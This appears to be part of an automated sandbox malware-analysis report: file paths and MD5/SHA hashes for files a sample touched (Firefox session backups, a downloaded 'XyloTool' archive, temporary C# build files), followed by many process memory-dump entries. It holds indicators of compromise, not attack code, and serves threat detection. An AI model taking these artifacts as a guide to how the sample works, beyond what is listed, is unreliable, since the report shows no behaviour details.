SHA51261de220c7db3693f5de84d72ea4b0f1233a279d89c998a725c83f34d31021c1da25ac27ff0d78b16b848853d256f25f4564f9e438ffd56b5c135d91c5cce730b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\rfj66zji.default-release\sessionstore-backups\recovery.jsonlz4Filesize
11KB
MD5c0aa8102362aa7679becb293ac19dda3
SHA18221967878f4d94dca7a4463b9e7507fd397cc97
SHA25672107484a09d7ca388e1f19a47e5bc9fe40d8a260ea08978c277a5dfa499c551
SHA512d4aac3fa3e1e3a76b027c708079a28a173980d0fb0d457c9a868d01cca5a9cc143a55f286fb201514b6e2095a15a8688b8aa61d28c2702edc50d89e66b349c0d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\rfj66zji.default-release\sessionstore-backups\recovery.jsonlz4Filesize
11KB
MD5561cdfba31eef0043b18a7618395fed4
SHA1fd9c185e7af66d626126c44fa4ae53b52b40b1cc
SHA2564cb3492eb0de2d750380f4ad542626812676fcd168064b51f4ec9fa4d1daa991
SHA51290e84ec06a1a4926639a1bcbdc76fc69ef4cba6ffc66d5af8f7498f6a4fce197d1a59d6874ba5b9d02138c601f873e30f6e3a752f4bbb417e194e982eaaedebb
-
C:\Users\Admin\Downloads\XyloTool.GpSJ9qST.rar.partFilesize
2.2MB
MD513a2f9a0b41995efe9bec96bc93a8b8c
SHA197458471c06adebc7a16ef9c05800e5002783f1a
SHA2560fa3a6778ff42b0016e5419c1dfb1e2e8ad914988142cd56835704fd8b0c1b6a
SHA5121098b179eef52e67e9f4e755da39d43b17438694feebcee88ede2ac3dbfe049d6f3e6bb2853200152791fd77897b8df496a8beb8f091b60314751659ce55dda7
-
C:\Users\Admin\Downloads\winrar-x64-701.Frk4Bxzk.exe.partFilesize
63KB
MD5d3ec96557834050f9edd29c3ed88cabe
SHA1af26f02653f4a0d2a3c673517b6c517ed529051f
SHA256bc7747c8272ce56edc0d941e81df1b9e93f8c03be786be59d2c240b985a6793a
SHA51277e5121874fbb294bb072dbb4b823f0ec343952b49adc96c357090bee6758944f52d09b817307b5e84921ec679449d3049009e6ffe572e9104172f7518f2cb87
-
\??\c:\Users\Admin\AppData\Local\Temp\c5hhtixo\CSCD6BDBEF5704E4AB0A8A12B1D19DBE296.TMPFilesize
652B
MD5229054f30ddd1bfe324cc3c69a8d19d5
SHA12400cf6679cc22e88d7c2a0890bf42ce3f663dcc
SHA2563b25db00b3c71e753186c87f95447e08dd1d6ba1a7e399c267c8dfa953bdfc60
SHA512b3f9ea38fa769ef1b1de8e5907a27b50f6a4f854b3e0e460caa8e8552bb2cd8535205190509392b9106f26076de8a23a911134bda11528964362e00adbfffa92
-
\??\c:\Users\Admin\AppData\Local\Temp\c5hhtixo\c5hhtixo.0.csFilesize
1004B
MD5c76055a0388b713a1eabe16130684dc3
SHA1ee11e84cf41d8a43340f7102e17660072906c402
SHA2568a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA51222d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2
-
\??\c:\Users\Admin\AppData\Local\Temp\c5hhtixo\c5hhtixo.cmdlineFilesize
607B
MD563dc6a9ef2df62dad124698b93f43b41
SHA1520e0f0a46c6b32b32f1d73367a40b0e290166ff
SHA256a40369e6beb929a0649bc3463a683b13a0b5e6a0590ebea8bffb348166e5d555
SHA512149332df5ac176a962f7cd1f8b26e7a8b269bc0532b486764828d410789535c5e68e123c67d1167e68960a9fd2f4218d41db7aa77a43ff5844087ac71f526723
-
memory/1564-183-0x000002137EF20000-0x000002137EF28000-memory.dmpFilesize
32KB
-
memory/1792-81-0x000001EDD87B0000-0x000001EDD87D2000-memory.dmpFilesize
136KB
-
memory/3152-4298-0x00007FF9F1C50000-0x00007FF9F1C69000-memory.dmpFilesize
100KB
-
memory/3152-4299-0x00007FF9F6F70000-0x00007FF9F6F7D000-memory.dmpFilesize
52KB
-
memory/3152-4303-0x00007FF9F2360000-0x00007FF9F236D000-memory.dmpFilesize
52KB
-
memory/3152-4572-0x00007FF9E1FC0000-0x00007FF9E2131000-memory.dmpFilesize
1.4MB
-
memory/3152-4300-0x00007FF9DF150000-0x00007FF9DF4C7000-memory.dmpFilesize
3.5MB
-
memory/3152-4301-0x00000137A28A0000-0x00000137A2C17000-memory.dmpFilesize
3.5MB
-
memory/3152-4600-0x00007FF9DF150000-0x00007FF9DF4C7000-memory.dmpFilesize
3.5MB
-
memory/3152-4571-0x00007FF9F1CA0000-0x00007FF9F1CBE000-memory.dmpFilesize
120KB
-
memory/3152-4296-0x00007FF9F1DD0000-0x00007FF9F1DE8000-memory.dmpFilesize
96KB
-
memory/3152-4297-0x00007FF9E1FC0000-0x00007FF9E2131000-memory.dmpFilesize
1.4MB
-
memory/3152-4295-0x00007FF9F1DF0000-0x00007FF9F1E1C000-memory.dmpFilesize
176KB
-
memory/3152-4289-0x00007FF9F20C0000-0x00007FF9F20E4000-memory.dmpFilesize
144KB
-
memory/3152-4290-0x00007FF9F9410000-0x00007FF9F941F000-memory.dmpFilesize
60KB
-
memory/3152-4574-0x00007FF9F1C50000-0x00007FF9F1C69000-memory.dmpFilesize
100KB
-
memory/3152-4305-0x00007FF9DF030000-0x00007FF9DF148000-memory.dmpFilesize
1.1MB
-
memory/3152-4491-0x00007FF9F20C0000-0x00007FF9F20E4000-memory.dmpFilesize
144KB
-
memory/3152-4302-0x00007FF9F1BE0000-0x00007FF9F1BF5000-memory.dmpFilesize
84KB
-
memory/3152-4304-0x00007FF9E22E0000-0x00007FF9E2745000-memory.dmpFilesize
4.4MB
-
memory/3152-4288-0x00007FF9E22E0000-0x00007FF9E2745000-memory.dmpFilesize
4.4MB
-
memory/3152-4575-0x00007FF9E22E0000-0x00007FF9E2745000-memory.dmpFilesize
4.4MB
-
memory/3152-4597-0x00007FF9F1C50000-0x00007FF9F1C69000-memory.dmpFilesize
100KB
-
memory/3152-4602-0x00007FF9F2360000-0x00007FF9F236D000-memory.dmpFilesize
52KB
-
memory/3152-4603-0x00007FF9DF030000-0x00007FF9DF148000-memory.dmpFilesize
1.1MB
-
memory/3152-4601-0x00007FF9F1BE0000-0x00007FF9F1BF5000-memory.dmpFilesize
84KB
-
memory/3152-4590-0x00007FF9F6F70000-0x00007FF9F6F7D000-memory.dmpFilesize
52KB
-
memory/3152-4591-0x00007FF9F20C0000-0x00007FF9F20E4000-memory.dmpFilesize
144KB
-
memory/3152-4592-0x00007FF9F9410000-0x00007FF9F941F000-memory.dmpFilesize
60KB
-
memory/3152-4593-0x00007FF9F1DF0000-0x00007FF9F1E1C000-memory.dmpFilesize
176KB
-
memory/3152-4594-0x00007FF9F1DD0000-0x00007FF9F1DE8000-memory.dmpFilesize
96KB
-
memory/3152-4595-0x00007FF9F1CA0000-0x00007FF9F1CBE000-memory.dmpFilesize
120KB
-
memory/3152-4596-0x00007FF9E1FC0000-0x00007FF9E2131000-memory.dmpFilesize
1.4MB
-
memory/3152-4598-0x00007FF9F1C00000-0x00007FF9F1C2E000-memory.dmpFilesize
184KB
-
memory/3152-4599-0x00007FF9E1F00000-0x00007FF9E1FB7000-memory.dmpFilesize
732KB
-
memory/4188-63-0x00007FF9F20D0000-0x00007FF9F20E9000-memory.dmpFilesize
100KB
-
memory/4188-73-0x00007FF9E2A00000-0x00007FF9E2E65000-memory.dmpFilesize
4.4MB
-
memory/4188-77-0x00007FF9F63C0000-0x00007FF9F63E4000-memory.dmpFilesize
144KB
-
memory/4188-66-0x00007FF9F1FD0000-0x00007FF9F1FFE000-memory.dmpFilesize
184KB
-
memory/4188-328-0x00007FF9F20B0000-0x00007FF9F20C5000-memory.dmpFilesize
84KB
-
memory/4188-64-0x00007FF9F6300000-0x00007FF9F630D000-memory.dmpFilesize
52KB
-
memory/4188-59-0x00007FF9F20F0000-0x00007FF9F210E000-memory.dmpFilesize
120KB
-
memory/4188-60-0x00007FF9E2490000-0x00007FF9E2601000-memory.dmpFilesize
1.4MB
-
memory/4188-56-0x00007FF9F2510000-0x00007FF9F2528000-memory.dmpFilesize
96KB
-
memory/4188-54-0x00007FF9F2220000-0x00007FF9F224C000-memory.dmpFilesize
176KB
-
memory/4188-31-0x00007FF9F63C0000-0x00007FF9F63E4000-memory.dmpFilesize
144KB
-
memory/4188-72-0x00007FF9E2110000-0x00007FF9E2487000-memory.dmpFilesize
3.5MB
-
memory/4188-320-0x00007FF9F2220000-0x00007FF9F224C000-memory.dmpFilesize
176KB
-
memory/4188-319-0x00007FF9F6F80000-0x00007FF9F6F8F000-memory.dmpFilesize
60KB
-
memory/4188-318-0x00007FF9F63C0000-0x00007FF9F63E4000-memory.dmpFilesize
144KB
-
memory/4188-329-0x00007FF9F2B80000-0x00007FF9F2B8D000-memory.dmpFilesize
52KB
-
memory/4188-330-0x00007FF9E1D90000-0x00007FF9E1EA8000-memory.dmpFilesize
1.1MB
-
memory/4188-317-0x00007FF9E2110000-0x00007FF9E2487000-memory.dmpFilesize
3.5MB
-
memory/4188-321-0x00007FF9F2510000-0x00007FF9F2528000-memory.dmpFilesize
96KB
-
memory/4188-302-0x00007FF9E2A00000-0x00007FF9E2E65000-memory.dmpFilesize
4.4MB
-
memory/4188-32-0x00007FF9F6F80000-0x00007FF9F6F8F000-memory.dmpFilesize
60KB
-
memory/4188-80-0x00007FF9E1D90000-0x00007FF9E1EA8000-memory.dmpFilesize
1.1MB
-
memory/4188-322-0x00007FF9F20F0000-0x00007FF9F210E000-memory.dmpFilesize
120KB
-
memory/4188-323-0x00007FF9E2490000-0x00007FF9E2601000-memory.dmpFilesize
1.4MB
-
memory/4188-324-0x00007FF9F6300000-0x00007FF9F630D000-memory.dmpFilesize
52KB
-
memory/4188-325-0x00007FF9F20D0000-0x00007FF9F20E9000-memory.dmpFilesize
100KB
-
memory/4188-326-0x00007FF9F1FD0000-0x00007FF9F1FFE000-memory.dmpFilesize
184KB
-
memory/4188-287-0x00007FF9E2A00000-0x00007FF9E2E65000-memory.dmpFilesize
4.4MB
-
memory/4188-327-0x00007FF9F1630000-0x00007FF9F16E7000-memory.dmpFilesize
732KB
-
memory/4188-71-0x000001FE0DDD0000-0x000001FE0E147000-memory.dmpFilesize
3.5MB
-
memory/4188-296-0x00007FF9F1FD0000-0x00007FF9F1FFE000-memory.dmpFilesize
184KB
-
memory/4188-25-0x00007FF9E2A00000-0x00007FF9E2E65000-memory.dmpFilesize
4.4MB
-
memory/4188-298-0x00007FF9E2110000-0x00007FF9E2487000-memory.dmpFilesize
3.5MB
-
memory/4188-70-0x00007FF9F1630000-0x00007FF9F16E7000-memory.dmpFilesize
732KB
-
memory/4188-75-0x00007FF9F20B0000-0x00007FF9F20C5000-memory.dmpFilesize
84KB
-
memory/4188-297-0x00007FF9F1630000-0x00007FF9F16E7000-memory.dmpFilesize
732KB
-
memory/4188-78-0x00007FF9F2B80000-0x00007FF9F2B8D000-memory.dmpFilesize
52KB
-
memory/4188-288-0x00007FF9F63C0000-0x00007FF9F63E4000-memory.dmpFilesize
144KB
-
memory/4188-266-0x00007FF9F20D0000-0x00007FF9F20E9000-memory.dmpFilesize
100KB
-
memory/4188-265-0x00007FF9E2490000-0x00007FF9E2601000-memory.dmpFilesize
1.4MB
-
memory/4188-264-0x00007FF9F20F0000-0x00007FF9F210E000-memory.dmpFilesize
120KB
-
memory/4924-4158-0x000001BD62230000-0x000001BD62238000-memory.dmpFilesize
32KB
-
memory/7648-4389-0x00000161AE3A0000-0x00000161AE3A8000-memory.dmpFilesize
32KB
-
memory/7928-4253-0x00007FF9F1DF0000-0x00007FF9F1E1C000-memory.dmpFilesize
176KB
-
memory/7928-4067-0x00007FF9F1C50000-0x00007FF9F1C69000-memory.dmpFilesize
100KB
-
memory/7928-4254-0x00007FF9F1DD0000-0x00007FF9F1DE8000-memory.dmpFilesize
96KB
-
memory/7928-4255-0x00007FF9F1CA0000-0x00007FF9F1CBE000-memory.dmpFilesize
120KB
-
memory/7928-4256-0x00007FF9E1FC0000-0x00007FF9E2131000-memory.dmpFilesize
1.4MB
-
memory/7928-4257-0x00007FF9F1C50000-0x00007FF9F1C69000-memory.dmpFilesize
100KB
-
memory/7928-4258-0x00007FF9F6F70000-0x00007FF9F6F7D000-memory.dmpFilesize
52KB
-
memory/7928-4259-0x00007FF9F1C00000-0x00007FF9F1C2E000-memory.dmpFilesize
184KB
-
memory/7928-4056-0x00007FF9E22E0000-0x00007FF9E2745000-memory.dmpFilesize
4.4MB
-
memory/7928-4058-0x00007FF9F9410000-0x00007FF9F941F000-memory.dmpFilesize
60KB
-
memory/7928-4057-0x00007FF9F20C0000-0x00007FF9F20E4000-memory.dmpFilesize
144KB
-
memory/7928-4063-0x00007FF9F1DF0000-0x00007FF9F1E1C000-memory.dmpFilesize
176KB
-
memory/7928-4066-0x00007FF9E1FC0000-0x00007FF9E2131000-memory.dmpFilesize
1.4MB
-
memory/7928-4065-0x00007FF9F1CA0000-0x00007FF9F1CBE000-memory.dmpFilesize
120KB
-
memory/7928-4064-0x00007FF9F1DD0000-0x00007FF9F1DE8000-memory.dmpFilesize
96KB
-
memory/7928-4068-0x00007FF9F6F70000-0x00007FF9F6F7D000-memory.dmpFilesize
52KB
-
memory/7928-4250-0x00007FF9E22E0000-0x00007FF9E2745000-memory.dmpFilesize
4.4MB
-
memory/7928-4071-0x00007FF9E1F00000-0x00007FF9E1FB7000-memory.dmpFilesize
732KB
-
memory/7928-4260-0x00007FF9DF150000-0x00007FF9DF4C7000-memory.dmpFilesize
3.5MB
-
memory/7928-4261-0x00007FF9E1F00000-0x00007FF9E1FB7000-memory.dmpFilesize
732KB
-
memory/7928-4262-0x00007FF9F1BE0000-0x00007FF9F1BF5000-memory.dmpFilesize
84KB
-
memory/7928-4263-0x00007FF9F2360000-0x00007FF9F236D000-memory.dmpFilesize
52KB
-
memory/7928-4264-0x00007FF9DF030000-0x00007FF9DF148000-memory.dmpFilesize
1.1MB
-
memory/7928-4265-0x00007FF9F9410000-0x00007FF9F941F000-memory.dmpFilesize
60KB
-
memory/7928-4266-0x00007FF9F20C0000-0x00007FF9F20E4000-memory.dmpFilesize
144KB
-
memory/7928-4249-0x00007FF9F9410000-0x00007FF9F941F000-memory.dmpFilesize
60KB
-
memory/7928-4248-0x00007FF9F20C0000-0x00007FF9F20E4000-memory.dmpFilesize
144KB
-
memory/7928-4224-0x00007FF9E22E0000-0x00007FF9E2745000-memory.dmpFilesize
4.4MB
-
memory/7928-4072-0x00007FF9F1BE0000-0x00007FF9F1BF5000-memory.dmpFilesize
84KB
-
memory/7928-4073-0x00007FF9F2360000-0x00007FF9F236D000-memory.dmpFilesize
52KB
-
memory/7928-4074-0x00007FF9DF030000-0x00007FF9DF148000-memory.dmpFilesize
1.1MB
-
memory/7928-4069-0x00007FF9F1C00000-0x00007FF9F1C2E000-memory.dmpFilesize
184KB
-
memory/7928-4070-0x00007FF9DF150000-0x00007FF9DF4C7000-memory.dmpFilesize
3.5MB
-
memory/8212-4469-0x000001F0EBD50000-0x000001F0EBD51000-memory.dmpFilesize
4KB
-
memory/8212-4464-0x000001F0EBD50000-0x000001F0EBD51000-memory.dmpFilesize
4KB
-
memory/8212-4465-0x000001F0EBD50000-0x000001F0EBD51000-memory.dmpFilesize
4KB
-
memory/8212-4466-0x000001F0EBD50000-0x000001F0EBD51000-memory.dmpFilesize
4KB
-
memory/8212-4467-0x000001F0EBD50000-0x000001F0EBD51000-memory.dmpFilesize
4KB
-
memory/8212-4468-0x000001F0EBD50000-0x000001F0EBD51000-memory.dmpFilesize
4KB
-
memory/8212-4463-0x000001F0EBD50000-0x000001F0EBD51000-memory.dmpFilesize
4KB
-
memory/8212-4456-0x000001F0EBD50000-0x000001F0EBD51000-memory.dmpFilesize
4KB
-
memory/8212-4458-0x000001F0EBD50000-0x000001F0EBD51000-memory.dmpFilesize
4KB
-
memory/8212-4457-0x000001F0EBD50000-0x000001F0EBD51000-memory.dmpFilesize
4KB
-
memory/9056-4625-0x00007FF9DF060000-0x00007FF9DF4C5000-memory.dmpFilesize
4.4MB
-
memory/9056-4633-0x00007FF9F1CA0000-0x00007FF9F1CB8000-memory.dmpFilesize
96KB
-
memory/9056-4632-0x00007FF9F1DD0000-0x00007FF9F1DFC000-memory.dmpFilesize
176KB
-
memory/9056-4626-0x00007FF9F20C0000-0x00007FF9F20E4000-memory.dmpFilesize
144KB
-
memory/9056-4627-0x00007FF9F9410000-0x00007FF9F941F000-memory.dmpFilesize
60KB